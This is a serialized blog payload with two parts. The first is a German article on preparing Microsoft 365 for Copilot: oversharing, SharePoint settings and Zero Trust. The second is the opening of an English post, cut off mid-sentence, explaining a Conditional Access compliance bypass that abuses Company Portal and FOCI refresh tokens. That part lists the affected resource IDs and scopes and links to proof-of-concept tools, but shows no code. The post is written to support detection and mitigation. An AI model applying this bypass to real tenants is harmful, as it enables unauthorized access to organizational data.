Zusammenhang mit der Vorbereitung auf Microsoft 365 und der Einführung von Copilot?",[629,11660,11662],{"id":11661},"was-ist-oversharing","Was ist Oversharing?",[353,11664,10713],{},[353,11666,11667],{},"Oversharing, oder das \"Überteilen\" von Daten, bedeutet, dass Personen auf Daten zugreifen können, auf die sie eigentlich keinen Zugriff haben sollten. Dieses Problem tritt häufig aufgrund mangelnder Datenkontrolle auf. Ein IT-Magazin titelte im November 2024: \"Copilot lässt Mitarbeiter die E-Mails ihrer Chefs lesen\". Diese Aussage ist jedoch faktisch falsch. Derartige Vorfälle sind nicht auf Copilot zurückzuführen, sondern auf unzureichende Datenkontrollen und Oversharing.",[353,11669,11670],{},"Der Microsoft Copilot basiert auf den Daten, die dem Nutzer zur Verfügung stehen. Er erhält keine zusätzlichen Berechtigungen, sondern verwendet einen Index, der es erleichtert, auf Informationen zu stoßen oder Dinge zu finden, von denen man nicht wusste, dass man darauf Zugriff hat.",[2548,11672,11674],{"id":11673},"arten-von-microsoft-teams","Arten von Microsoft Teams",[353,11676,9352],{},[353,11678,11679],{},"Wir unterscheiden bei Teams zwischen privaten und öffentlichen Teams. Befinden sich sensible oder geschützte Dokumente in öffentlichen Teams, können diese von allen Mitarbeitenden im Unternehmen eingesehen und somit auch von Copilot indexiert werden.",[353,11681,11682],{},"Es spricht grundsätzlich nichts dagegen, weiterhin auch öffentliche Teams zu nutzen – sogar viele davon. Wichtig ist jedoch sicherzustellen, dass die darin geteilten Informationen und Dokumente für alle zugänglich sein dürfen.",[629,11684,11686],{"id":11685},"empfehlung","Empfehlung",[353,11688,10713],{},[353,11690,11691],{},"Überprüft regelmäßig, welche Daten in euren Teams abgelegt sind, und räumt gegebenenfalls auf. Häufig handelt es sich um Altlasten, die beispielsweise aus der Einführungszeit von Microsoft Teams stammen und im Laufe der Zeit gewachsen sind.",[2548,11693,11695],{"id":11694},"zugriff-auf-daten-in-sharepoint-online","Zugriff auf Daten in SharePoint Online",[353,11697,9352],{},[353,11699,11700],{},"Die Dokumente, die in öffentlichen Teams abgelegt sind, befinden sich bekanntermaßen auch in SharePoint. Neben den Team-Sites in SharePoint gibt es jedoch auch eigenständige SharePoint-Sites und -Bibliotheken. Häufig haben auch hier alle oder viele Mitarbeitende Zugriff.",[629,11702,11686],{"id":11703},"empfehlung-1",[353,11705,10713],{},[353,11707,11708],{},"Überprüft die Zugriffs- und Berechtigungseinstellungen auf den wichtigen SharePoint-Sites. Häufig verstecken sich dort beispielsweise \"Alle Benutzer\"-Objekte in den Gruppen der \"Website-Besucher\".",[2548,11710,11712],{"id":11711},"dokumente-und-ordner-ab-jetzt-richtig-teilen","Dokumente und Ordner (ab jetzt) richtig teilen",[353,11714,9352],{},[353,11716,11717],{},"Ein weiterer, häufiger Fehler sind die sogenannten \"Everyone Except External\"-Links, mit denen Dokumente oder Ordner geteilt werden.",[353,11719,11720],{},"Praktisch, aber gefährlich: Wählt man beim Teilen eines Dokuments den Linktyp “Personen in meiner Organisation”, erhält jede Person, die den Link verwendet, Zugriff auf die Datei – und somit auch Copilot, da dieser immer im Benutzerkontext agiert.",[353,11722,11723,11727],{},[356,11724],{"alt":11725,"src":11726},"Freigabeeinstellungen eines Dokuments","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-365-copilot-link-settings.png","{: .post__screenshot}",[353,11729,11730],{},"Solche Links auf ganze Ordner, deren Inhalte sich über Monate oder Jahre verändern, führen häufig zu Oversharing-Vorfällen. Diese Art von Link bleibt wichtig und praktisch, sollte jedoch nicht als Standardeinstellung verwendet werden. Ein einfacher Tipp kann hier Abhilfe schaffen.",[629,11732,11686],{"id":11733},"empfehlung-2",[353,11735,10713],{},[353,11737,11738],{},"Im SharePoint-Admincenter findet ihr unter „Richtlinien“ den Abschnitt „Datei- und Ordnerlinks“. Setzt hier die Standardeinstellung auf „Bestimmte Personen“. Dadurch wird die Option „Nur Personen in meiner Organisation“ erst durch bewusstes Anklicken verfügbar.",[353,11740,11741,11727],{},[356,11742],{"alt":11473,"src":11743},"https://res.cloudinary.com/c4a8/image/upload/w_940,h_200,c_lpad/blog/pics/microsooft-365-copilot-default-link-setting.png",[353,11745,11746],{},[374,11747,11752,11756],{"role":7994,"className":11748,"dataText":11750,"href":11751},[7996,11749,8001],"link","Primary Link","/de/workplace/sharepoint-power-platform",[7258,11753,11755],{"className":11754},[8008],"Mehr erfahren",[7258,11757,11763],{"className":11758,"style":11762},[11759,11760,11761,8001],"icon","icon--right","icon--arrow","--color-icon: currentColor; --icon-rotation: 0deg;",[11764,11765,11774],"svg",{"viewBox":11766,"width":11767,"height":11767,"padding":11768,"xmlSpace":11769,"version":11770,"xmlns":11771,"xmlns:link":11772,"style":11773},"0 0 28 17","28px","6","preserve","1.1","http://www.w3.org/2000/svg","http://www.w3.org/1999/xlink","stroke: currentcolor; transform: rotate(var(--icon-rotation)) scale(var(--icon-scale));",[11775,11776,11778,11787],"g",{"transform":11777},"translate(0.75 0.75)",[11779,11780],"path",{"d":11781,"transform":11782,"fill":11783,"fillRule":11784,"strokeWidth":11785,"strokeLineCap":11786,"strokeLineJoin":11786},"M0.5 0.5L26 0.5","translate(0 7)","none","evenodd","1.5","round",[11779,11788],{"d":11789,"transform":11790,"fill":11783,"fillRule":11784,"strokeWidth":11785,"strokeLineCap":11786,"strokeLineJoin":11786},"M0 15L7 7.5L0 0","translate(19 0)",[2548,11792,11632],{"id":11793},"sharepoint-advanced-management",[353,11795,9352],{},[353,11797,11798],{},"Eine neue zentrale Möglichkeit, um das volle Potenzial auszuschöpfen, ist die Nutzung der SharePoint Advanced Management-Funktionen. Diese ist seit dem 01.01.2025 in allen M365 Copilot Lizenzen inkludiert. Das bedeutet, egal ob man 1 oder 10.000 M365 Copilot Lizenzen hat, SharePoint Advanced Management ist jetzt inklusive.",[353,11800,11801],{},"SharePoint Advanced Management umfasst eine Vielzahl von Funktionen rund um die Themen Data Oversharing, Governance und Security. Bisher war dieses Add-On zusätzlich zu lizenzieren und hat deswegen kaum Beachtung gefunden. Die Funktionen und Möglichkeiten, die darin stecken, sind aber beachtlich und waren schon immer eine sinnvolle Ergänzung für die Administration und Vorbereitung von SharePoint Online in Bezug auf eine Einführung von künstlicher Intelligenz, wie Copilot. Microsoft beschreibt 4 Säulen, die SAM unterstützt:",[10832,11803,10834],{},[8921,11805,11806,11817],{},[11807,11808,11809],"thead",{},[8928,11810,11811,11814],{},[8932,11812,11813],{},"Thema",[8932,11815,11816],{},"Beschreibung",[8925,11818,11819,11827,11835,11843],{},[8928,11820,11821,11824],{},[8948,11822,11823],{},"Verwalten von Content-Wildwuchs",[8948,11825,11826],{},"Unterstützung der Administratoren bei der Verwaltung einer stetig wachsenden Anzahl an Dateien",[8928,11828,11829,11832],{},[8948,11830,11831],{},"Oversharing verhindern",[8948,11833,11834],{},"Erkennung und Verhinderung von Oversharing, z. B. durch defekte Berechtigungsvererbungen",[8928,11836,11837,11840],{},[8948,11838,11839],{},"Zugriff von Copilot auf Inhalte verwalten",[8948,11841,11842],{},"Tools zur Echtzeitkontrolle darüber, auf welche Dokumente Copilot zugreifen darf und auf welche nicht",[8928,11844,11845,11848],{},[8948,11846,11847],{},"Verwaltung des Dokumenten-Lifecycle",[8948,11849,11850],{},"Unterstützung bei der Überwachung und Steuerung aktiver und inaktiver SharePoint-Inhalte",[629,11852,11686],{"id":11853},"empfehlung-3",[353,11855,10713],{},[353,11857,11858],{},"Wir empfehlen jedem, der sich aktuell mit M365 Copilot beschäftigt, diese Funktionen zu aktivieren und zu nutzen. Dazu gehören insbesondere die Data Access Governance, Site Lifecycle Management und Restricted Access Control Policy sowie die Funktionen, von denen einige noch in der Preview sind (Oversharing Baseline Report und Restricted Content Discoverability Policy).",[353,11860,11861,11862],{},"Mehr Details zu SharePoint Advanced Management findet ihr ",[374,11863,11866],{"href":11864,"rel":11865},"https://learn.microsoft.com/en-us/sharepoint/get-ready-copilot-sharepoint-advanced-management",[378],"auf der offiziellen Seite von Microsoft.",[2548,11868,11638],{"id":11869},"grundlegende-sicherheit-im-tenant-herstellen",[353,11871,9352],{},[353,11873,11874],{},"Neben dem Zugriff auf Daten durch Copilot sollten wir sicherstellen, dass unser Tenant umfassend abgesichert ist. Der Einsatz künstlicher Intelligenz macht dies spätestens jetzt unverzichtbar. Es gibt zahlreiche Maßnahmen zur Absicherung – hier ein Überblick mit den wichtigsten Punkten.",[629,11876,11878],{"id":11877},"umsetzung-zero-trust","Umsetzung Zero Trust",[353,11880,10713],{},[353,11882,11883],{},"Der Begriff Zero-Trust ist in aller Munde – wahrscheinlich bist du ihm auch schon begegnet. Doch was bedeutet das genau, besonders im Kontext von Copilot? Kurz gesagt: Zero-Trust bedeutet in diesem Fall, dass niemand pauschalen Zugriff auf alles erhält, sondern nur auf die Ressourcen, die aktuell benötigt werden. Dieses Prinzip, bekannt als Least Privileged Access, ist essenziell, um Daten und Systeme vor unberechtigtem Zugriff zu schützen. Es knüpft direkt an Themen wie Oversharing an, da der Fokus darauf liegt, nur die notwendigen Informationen freizugeben.",[353,11885,11886],{},"Doch Zero-Trust beschränkt sich nicht nur auf SharePoint. Es betrifft auch den Zugriff auf E-Mails in Outlook, Kundeninformationen im CRM-System und andere sensible Bereiche. Mit der zunehmenden Integration von Copilot und künstlicher Intelligenz in Microsoft 365 und darüber hinaus gewinnt dieses Konzept weiter an Bedeutung. Je früher du und dein Team euch damit auseinandersetzt, desto besser seid ihr für die Zukunft gerüstet.",[629,11888,11890],{"id":11889},"zero-trust-besonders-wichtig-für-administratoren","Zero-Trust: Besonders wichtig für Administratoren",[353,11892,10713],{},[353,11894,11895],{},"Für Admins gewinnt das Thema noch mehr an Bedeutung: Mit der Einführung von Copilot in den Admincentern und dem Security-Copilot wird es unverzichtbar, administrative Zugriffe abzusichern. Tools wie Privileged Identity Management (PIM) sind hierbei entscheidend, um sicherzustellen, dass Admin-Rechte nur dann vergeben werden, wenn sie wirklich benötigt werden – und selbst dann nur zeitlich begrenzt und streng überwacht.",[353,11897,11898],{},[433,11899,11900],{},"Mehrfaktor-Authentifizierung & Bedingter Zugriff? Ein Muss",[353,11902,11903],{},"Ein weiteres Kernelement der Sicherheit ist die Einrichtung von Multi-Faktor-Authentifizierung (MFA) und Conditional Access für alle Entra-ID-Konten in Microsoft 365. Microsoft forciert diese Einstellungen zunehmend, sodass du sicherstellen solltest, dass sämtliche Konten in deiner Organisation entsprechend abgesichert sind.",[353,11905,11906],{},"Warum ist das so wichtig? Technisch gesehen hat die Nutzung von Copilot nichts direkt mit MFA oder Conditional Access zu tun. Doch es geht darum sicherzustellen, dass die Person, die sich anmeldet, tatsächlich diejenige ist, für die sie sich ausgibt. Denn es wäre fatal, wenn ein Angreifer Zugriff auf einen leistungsstarken KI-Assistenten erhält.",[629,11908,11910],{"id":11909},"sicherheit-ist-mehr-als-nur-grundlagen","Sicherheit ist mehr als nur Grundlagen",[353,11912,10713],{},[353,11914,11915],{},"Natürlich sind Zero-Trust, MFA und Conditional Access nur der Anfang. Ein wirklich sicherer Tenant umfasst viele weitere Aspekte. Microsoft bietet eine breite Palette an Sicherheitslösungen, darunter die Microsoft Defender-Produkte, Entra ID, Sentinel und viele mehr. Diese Tools helfen dir, deine Organisation noch besser zu schützen und Sicherheitslücken zu schließen.",[629,11917,11686],{"id":11918},"empfehlung-4",[353,11920,10713],{},[353,11922,11923],{},"Wenn du Unterstützung bei der Umsetzung benötigst oder unsicher bist, wo du anfangen sollst, helfen wir dir gerne weiter. Sicherheit ist eine Reise – und wir begleiten und unterstützen dich dabei, die richtigen Schritte zu machen, um dein Unternehmen zu schützen.",[353,11925,11926,1501,11945],{},[374,11927,11930,11934],{"role":7994,"className":11928,"dataText":11750,"href":11929},[7996,11749,8001],"/de/security/security-consulting",[7258,11931,11933],{"className":11932},[8008],"Mehr zu unserem Security Consulting Angebot erfahren",[7258,11935,11937],{"className":11936,"style":11762},[11759,11760,11761,8001],[11764,11938,11939],{"viewBox":11766,"width":11767,"height":11767,"padding":11768,"xmlSpace":11769,"version":11770,"xmlns":11771,"xmlns:link":11772,"style":11773},[11775,11940,11941,11943],{"transform":11777},[11779,11942],{"d":11781,"transform":11782,"fill":11783,"fillRule":11784,"strokeWidth":11785,"strokeLineCap":11786,"strokeLineJoin":11786},[11779,11944],{"d":11789,"transform":11790,"fill":11783,"fillRule":11784,"strokeWidth":11785,"strokeLineCap":11786,"strokeLineJoin":11786},[374,11946,11948,11952],{"role":7994,"className":11947,"dataText":11750,"href":8529},[7996,11749,8001],[7258,11949,11951],{"className":11950},[8008],"Mehr über unser Cloud Security Operations Center erfahren",[7258,11953,11955],{"className":11954,"style":11762},[11759,11760,11761,8001],[11764,11956,11957],{"viewBox":11766,"width":11767,"height":11767,"padding":11768,"xmlSpace":11769,"version":11770,"xmlns":11771,"xmlns:link":11772,"style":11773},[11775,11958,11959,11961],{"transform":11777},[11779,11960],{"d":11781,"transform":11782,"fill":11783,"fillRule":11784,"strokeWidth":11785,"strokeLineCap":11786,"strokeLineJoin":11786},[11779,11962],{"d":11789,"transform":11790,"fill":11783,"fillRule":11784,"strokeWidth":11785,"strokeLineCap":11786,"strokeLineJoin":11786},[2548,11964,11644],{"id":11965},"aktualisierung-der-office-applikationen",[353,11967,9352],{},[353,11969,11970],{},"Der volle Mehrwert von Microsoft Copilot entfaltet sich erst durch die Integration des AI-Assistenten in den installierten Office-Applikationen (M365 Apps). Dazu gehören aktuell Word, Excel, PowerPoint, OneNote, Outlook und Teams.",[353,11972,11973,11727],{},[356,11974],{"alt":11975,"src":11976},"Microsoft 365 Tenant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsooft-365-copilot-tenant.png",[353,11978,11979],{},"Allerdings unterscheidet Microsoft die Verfügbarkeit und Funktionen von Copilot je nach Version der installierten Apps. Wenn bei Benutzenden beispielsweise der Semi-Annual Enterprise Channel eingerichtet ist, stehen ihnen die KI-Features von Microsoft nicht zur Verfügung.",[629,11981,11686],{"id":11982},"empfehlung-5",[353,11984,10713],{},[353,11986,11987],{},"Stellt sicher, dass eure Office-Apps mindestens den Monthly Enterprise Channel oder idealerweise den Current Channel nutzen. Nur so gewährleistet ihr, dass Copilot und die neuesten Funktionen nahtlos verfügbar sind.",[353,11989,11990,11991,11995],{},"Doch das ist nur ein Teil des Gesamtbildes. Themen wie Application Lifecycle Management und der Einsatz moderner Software-Management-Plattformen spielen eine entscheidende Rolle, insbesondere in Verbindung mit Intune. Hierbei unterstützt euch unsere Lösung ",[374,11992,494],{"href":11993,"rel":11994},"https://www.realmjoin.com/",[378],", um den Prozess effizient zu gestalten und eure Anwendungen stets auf dem neuesten Stand zu halten.",[353,11997,11998],{},"RealmJoin ist die Cloud-basierte Ergänzung zu Microsoft Intune und das fehlende Puzzlestück auf dem Weg zu einer umfassenden Client-Management-Plattform. Es erleichtert die Bereitstellung von fast 2.000 vorgefertigten Standardanwendungen für Intune in hoher Qualität – eine moderne Paketfabrik für benutzerdefinierte Anwendungen, ergänzt durch zusätzliche Funktionen wie LAPS, Remote-Support und Runbook-Automatisierung.",[2548,12000,11650],{"id":12001},"datenschutz-datensicherheit",[353,12003,9352],{},[353,12005,12006],{},"Gerade in europäischen Unternehmen stößt man auf Vorbehalte, wenn es um die Einführung von Microsoft Copilot geht – und das ist absolut nachvollziehbar. Neue Technologien können Unsicherheit auslösen, insbesondere wenn es um sensible Themen wie Datenschutz und Kontrolle geht.",[353,12008,12009],{},"Wenn ihr Copilot einführen möchtet, denkt daran, dass es nicht nur um die Technik geht. Setzt euch frühzeitig mit den entsprechenden Datenschutz- und Sicherheitsanforderungen auseinander. Holt dabei alle relevanten Stakeholder ins Boot – dazu gehören der interne oder externe Datenschutzbeauftragte, euer CISO, Betriebsräte, Compliance-Administratoren und andere Verantwortliche. Besprecht Vorbehalte und Fragen offen miteinander. Oft lassen sich diese Bedenken durch klare Informationen und bestehende Richtlinien ausräumen.",[353,12011,12012],{},"Microsoft bietet umfassende Dokumentationen und Erklärungen, die zeigen, wie, wann und wo Daten verarbeitet werden. Hier sind die wichtigsten Fakten:",[367,12014,12015,12021,12027,12033,12039,12045,12051],{},[370,12016,12017,12020],{},[433,12018,12019],{},"Grounding der KI-Modelle:"," Die von Copilot genutzten KI-Modelle greifen nicht direkt auf eure Daten zu. Stattdessen erfolgt der Zugriff über den Microsoft Graph und ist strikt auf den Benutzerkontext beschränkt.",[370,12022,12023,12026],{},[433,12024,12025],{},"Datenschutz- und Sicherheitsstandards:"," Copilot erfüllt alle relevanten Datenschutz-, Sicherheits- und Compliance-Vorgaben, darunter die DSGVO, die EU-Datenschutzgrundverordnung sowie Standards wie ISO/IEC 27018 und den EU AI-Act.",[370,12028,12029,12032],{},[433,12030,12031],{},"EU-Data Boundary:"," Alle Daten werden so nah wie möglich am Benutzer verarbeitet, jedoch immer innerhalb der EU. Die sogenannte EU-Data Boundary wird strikt eingehalten.",[370,12034,12035,12038],{},[433,12036,12037],{},"Verschlüsselung:"," Eingaben (Prompts) und Ergebnisse werden verschlüsselt und niemals zur Weiterentwicklung von KI-Modellen (LLMs) genutzt.",[370,12040,12041,12044],{},[433,12042,12043],{},"Compliance und Nachvollziehbarkeit:"," Prompts und Ergebnisse werden verschlüsselt im Tenant gespeichert. Sie können im Rahmen gesetzlicher Anforderungen analysiert werden, beispielsweise für Prüfungen oder bei richterlichen Anordnungen. Der Zugriff darauf ist nur mit speziellen Berechtigungen, etwa über Content Search oder eDiscovery, möglich.",[370,12046,12047,12050],{},[433,12048,12049],{},"Sicherheitsmaßnahmen:"," Microsoft schützt seine Dienste, einschließlich Copilot, durch logische Isolierung, physische Sicherheitsmaßnahmen und Verschlüsselungstechnologien. Plug-Ins haben nur eingeschränkten Zugriff auf verschlüsselte Inhalte.",[370,12052,12053,12056],{},[748,12054,12055],{},"Responsible AI:"," Microsoft legt großen Wert auf die verantwortungsvolle Nutzung von KI. Der Fokus liegt darauf, KI-Services positiv und ethisch einzusetzen und ihren Missbrauch für illegale oder fragwürdige Zwecke zu verhindern.",[629,12058,11686],{"id":12059},"empfehlung-6",[353,12061,10713],{},[353,12063,12064],{},"Indem ihr euch frühzeitig mit diesen Themen beschäftigt und die relevanten Personen einbindet, schafft ihr Vertrauen und legt den Grundstein für eine erfolgreiche Einführung. Viele Bedenken lassen sich bereits durch die bestehenden Sicherheitsmaßnahmen und Richtlinien von Microsoft entkräften. Wenn ihr Unterstützung benötigt, stehen wir euch gerne zur Seite. Datenschutz und Sicherheit sind entscheidend – und wir helfen euch, diese Anforderungen optimal umzusetzen.",[353,12066,12067],{},"Mehr Informationen und Hintergrundwissen gibt es direkt bei Microsoft an verschiedenen Stellen wie:",[367,12069,12070,12076,12082],{},[370,12071,12072],{},[374,12073,12074],{"href":12074,"rel":12075},"https://learn.microsoft.com/de-de/copilot/microsoft-365/microsoft-365-copilot-privacy",[378],[370,12077,12078],{},[374,12079,12080],{"href":12080,"rel":12081},"https://support.microsoft.com/de-de/topic/was-ist-verantwortungsvolle-ki-33fc14be-15ea-4c2c-903b-aa493f5b8d92",[378],[370,12083,12084],{},[374,12085,12086],{"href":12086,"rel":12087},"https://learn.microsoft.com/de-de/copilot/microsoft-365/microsoft-365-copilot-architecture-data-protection-auditing",[378],{"title":402,"searchDepth":403,"depth":403,"links":12089},[12090,12091,12094,12097,12100,12103,12106,12112,12115],{"id":11616,"depth":403,"text":4587},{"id":11653,"depth":403,"text":11626,"children":12092},[12093],{"id":11661,"depth":704,"text":11662},{"id":11673,"depth":403,"text":11674,"children":12095},[12096],{"id":11685,"depth":704,"text":11686},{"id":11694,"depth":403,"text":11695,"children":12098},[12099],{"id":11703,"depth":704,"text":11686},{"id":11711,"depth":403,"text":11712,"children":12101},[12102],{"id":11733,"depth":704,"text":11686},{"id":11793,"depth":403,"text":11632,"children":12104},[12105],{"id":11853,"depth":704,"text":11686},{"id":11869,"depth":403,"text":11638,"children":12107},[12108,12109,12110,12111],{"id":11877,"depth":704,"text":11878},{"id":11889,"depth":704,"text":11890},{"id":11909,"depth":704,"text":11910},{"id":11918,"depth":704,"text":11686},{"id":11965,"depth":403,"text":11644,"children":12113},[12114],{"id":11982,"depth":704,"text":11686},{"id":12001,"depth":403,"text":11650,"children":12116},[12117],{"id":12059,"depth":704,"text":11686},{"seoTitle":12119,"titleClass":7896,"date":12120,"categories":12121,"blogtitlepic":12122,"socialimg":12123,"customExcerpt":12124,"keywords":12125,"contactInContent":12126,"scripts":12152},"Microsoft 365 Copilot einführen: Sicherheits- und Datenschutz-Tipps für 2025","2025-01-10",[534],"header-m365-copilot","/blog/heads/header-m365-copilot.png","Auch 2025 bleibt künstliche Intelligenz, insbesondere Microsoft 365 Copilot, ein zentrales Thema. Viele Unternehmen stehen vor der Pilotierung oder Einführung dieser Technologie. Falls auch ihr dazu gehört, haben wir die wichtigsten Grundlagen vorbereitet, die ihr vorab prüfen oder umsetzen solltet. Besonders wichtig: eine gründliche Auseinandersetzung mit Sicherheits- und Datenschutzaspekten, um eine sichere Implementierung zu gewährleisten. In diesem Artikel erfahrt ihr, worauf es dabei ankommt, um Microsoft Copilot optimal zu nutzen.","Microsoft 365 Copilot, Einführung Microsoft Copilot, Sicherheitsrichtlinien Microsoft 365, Datenschutz Copilot, KI Implementierung, Copilot Pilotierung, Microsoft Copilot Grundlagen, sichere Implementierung, Microsoft KI Einführung, Microsoft 365 Tipps 2025",{"quote":415,"infos":12127},{"bgColor":12128,"headline":9487,"subline":12129,"level":2548,"textStyling":9489,"flush":9490,"person":12130,"form":12137},"var(--color-blue-dark)","Ihr möchtet wissen, wie ihr Copilot optimal in eurem Unternehmen einführt? Wir unterstützen euch gerne bei der Integration und beantworten eure Fragen zu den technischen Voraussetzungen, Sicherheitsmaßnahmen und Nutzungsszenarien.",{"image":12131,"cloudinary":415,"alt":31,"name":31,"quotee":31,"quoteeTitle":12132,"quote":12133,"detailsHeader":10135,"details":12134},"/people/Karsten.Kleinschmidt-250.jpg","Managed Workplace Lead","Damit Microsoft 365 Copilot sein volles Potenzial entfalten kann, ist eine sorgfältige Vorbereitung im Hinblick auf Sicherheit und Compliance unerlässlich.",[12135,12136],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":12138,"method":407,"action":9511,"fields":12139},{"skin":9510},[12140,12142,12144,12146,12148,12150,12151],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":12141},"Bitte Namen eingeben",{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":12143},"Bitte Unternehmensnamen ausfüllen",{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":12145},"Bitte E-Mail-Adresse eingeben",{"label":12147,"type":9527,"id":9528,"required":415,"requiredMsg":9529},"Deine Daten werden zur Bearbeitung und Beantwortung Deiner Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz findest du in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":9531,"id":9532,"value":12149},"Anfrage Blog Microsoft 365 Copilot",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"slick":415,"form":415},"/posts/2025-01-09-microsoft-365-copilot",{"title":11610,"description":402},"posts/2025-01-09-microsoft-365-copilot",[534,12157,12158,12159],"Microsoft 365 Copilot","KI Implementierung","Copilot Pilotierung","5VfpBwS7AdsiFOeg002wFO44x-q_K7jgKX1Xd77hd0U",{"id":12162,"title":12163,"author":12164,"body":12165,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":12785,"moment":12787,"navigation":415,"path":12821,"seo":12822,"stem":12823,"tags":12824,"webcast":406,"__hash__":12827},"content_de/posts/2025-01-14-compliant-device-bypass.md","Compliant Device Bypass - All you need to know!",[224,102,260],{"type":350,"value":12166,"toc":12768},[12167,12171,12173,12223,12227,12229,12241,12247,12258,12264,12267,12271,12273,12277,12279,12282,12284,12344,12347,12350,12354,12356,12360,12362,12377,12384,12387,12390,12392,12395,12398,12401,12409,12420,12423,12425,12428,12432,12434,12437,12442,12446,12448,12451,12454,12457,12602,12606,12608,12611,12650,12654,12656,12663,12666,12669,12683,12686,12689,12742,12750,12754,12756,12759,12762,12765],[2548,12168,12170],{"id":12169},"what-happened-so-far","What happened so far?",[353,12172,9352],{},[367,12174,12175,12196,12211,12220],{},[370,12176,12177,12178,12183,12184,12189,12190,12195],{},"In December 2024 ",[374,12179,12182],{"href":12180,"rel":12181},"https://x.com/TEMP43487580",[378],"Yuya Chudo"," gave his talk “",[374,12185,12188],{"href":12186,"rel":12187},"https://www.blackhat.com/eu-24/briefings/schedule/#unveiling-the-power-of-intune-leveraging-intune-for-breaking-into-your-cloud-and-on-premise-42176",[378],"Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise","” at the Black Hat Europe conference. In this session he showed how to abuse a hardcoded rarely known exclusion in Conditional Access (CA) for device compliance in combination with the undocumented “",[374,12191,12194],{"href":12192,"rel":12193},"https://github.com/secureworks/family-of-client-ids-research",[378],"FOCI-Feature","” in Entra ID. In the talk he also presented the response from Microsoft MSRC (VULN-123240) that this behavior is by design and required for successful Intune Enrollment of new devices.",[370,12197,12198,12199,12204,12205,12210],{},"Some days after the conference Sunny Chau published the proof-of-concept tool ",[374,12200,12203],{"href":12201,"rel":12202},"https://github.com/JumpsecLabs/TokenSmith",[378],"TokenSmith"," including a ",[374,12206,12209],{"href":12207,"rel":12208},"https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/",[378],"companion blog posts"," - what made the technique available for a broader audience.",[370,12212,12213,12214,12219],{},"In addition, a ",[374,12215,12218],{"href":12216,"rel":12217},"https://github.com/zh54321/PoCEntraDeviceComplianceBypass/blob/main/poc_entra_compliance_bypass.ps1",[378],"PoC written in PowerShell"," has been published.",[370,12221,12222],{},"Since the end of December, we at glueckkanja AG have been investigating how to prevent and detect this technique. In this blog post we would like to share some of our insights regarding the attack and discuss mitigation and detection options.",[2548,12224,12226],{"id":12225},"tldr","TL;DR",[353,12228,9352],{},[353,12230,12231,12232,12237,12238],{},"There are some resources with a built-in exclusion to specific Grant Controls/Conditions in Conditional Access to solve certain problems. One of them is the exclusion of the Company Portal App for Device Compliance to solve the chicken-egg-problem to get devices enrolled in Intune before they are considered compliant. This behavior is ",[374,12233,12236],{"href":12234,"rel":12235},"https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-alt-all-users-compliant-hybrid-or-mfa#:~:text=You%20can%20enroll,Company%20Portal%20application",[378],"documented here",".\n",[433,12239,12240],{},"This means you can get access and refresh token for this app from an unmanaged device even if a CA policy is enforcing Device Compliance for “All resources”.",[353,12242,12243,11727],{},[356,12244],{"alt":12245,"src":12246},"image.png","https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-02.png",[353,12248,12249,12250,12254,12255],{},"Microsoft has implemented a feature called Family of Client IDs (FOCI) which allows a group of Microsoft OAuth client applications to obtain access tokens as any other client in the family using their refresh token. A behavior otherwise not allowed in the OAuth2 standard. Read the ",[374,12251,12253],{"href":12192,"rel":12252},[378],"original work of Secureworks"," for more details.\n",[433,12256,12257],{},"Since the Company Portal App is a “family member” the requested Refresh Tokens for it can be used to get tokens for other apps in the family.",[353,12259,12260,12261],{},"The FOCI feature is limited and the consent between the client id and the resource must be explicitly configured and granted. In the case of the Company Portal App this consent has been granted, among others, for access to Microsoft Graph using a restricted scope and to the Azure AD Graph API with the permission of the current user.\n",[433,12262,12263],{},"This means a Company Portal refresh token can be used to obtain e.g. Azure AD Graph API access tokens with the scope user_impersonation, allowing us to do a lot of things with eg. AADInternals or ROADrecon",[353,12265,12266],{},"To execute the attack, the attacker requires either valid credentials of the victim as well as the ability to perform MFA if this is required by Conditional Access or a valid refresh token.",[2548,12268,12270],{"id":12269},"what-risk-and-blast-radius-exists","What risk and blast radius exists?",[353,12272,9352],{},[629,12274,12276],{"id":12275},"which-of-the-possible-resources-scopes-are-affected-from-the-compliance-exclusion","Which of the possible resources (scopes) are affected from the compliance exclusion?",[353,12278,10713],{},[353,12280,12281],{},"The Attacker has the option to request tokens for another FOCI application as already described before. However, Microsoft has implemented a bypass for the device compliance requirements only for accessing tokens to certain resource applications various API permission scope. In particular, the following delegated API permissions are sensitive and of interest to attackers:",[10832,12283,10834],{},[8921,12285,12286,12299],{},[11807,12287,12288],{},[8928,12289,12290,12293,12296],{},[8932,12291,12292],{},"Resource Application",[8932,12294,12295],{},"Application Id",[8932,12297,12298],{},"Delegated Permission Scope",[8925,12300,12301,12312,12323,12334],{},[8928,12302,12303,12306,12309],{},[8948,12304,12305],{},"AADGraph",[8948,12307,12308],{},"00000002-0000-0000-c000-000000000000",[8948,12310,12311],{},"user_impersonation",[8928,12313,12314,12317,12320],{},[8948,12315,12316],{},"Microsoft Graph API",[8948,12318,12319],{},"00000003-0000-0000-c000-000000000000",[8948,12321,12322],{},"“email\", \"openid\", \"profile\",\"Device.Read.All\", \"DeviceManagementConfiguration.Read.All\", \"DeviceManagementConfiguration.ReadWrite.All\", \"ServicePrincipalEndpoint.Read.All\", \"User.Read”",[8928,12324,12325,12328,12331],{},[8948,12326,12327],{},"Device Registration Service",[8948,12329,12330],{},"01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9",[8948,12332,12333],{},"adrs_access",[8928,12335,12336,12339,12342],{},[8948,12337,12338],{},"Windows Azure Service Management API",[8948,12340,12341],{},"797f4846-ba00-4fd7-ba43-dac1f8f63013",[8948,12343,12311],{},[353,12345,12346],{},"Since the granted permissions are not for the application itself, the impact depends on the privileges of the caller (user account) and which delegated permission scopes are authorized to execute API calls on the scope.",[353,12348,12349],{},"Let us have 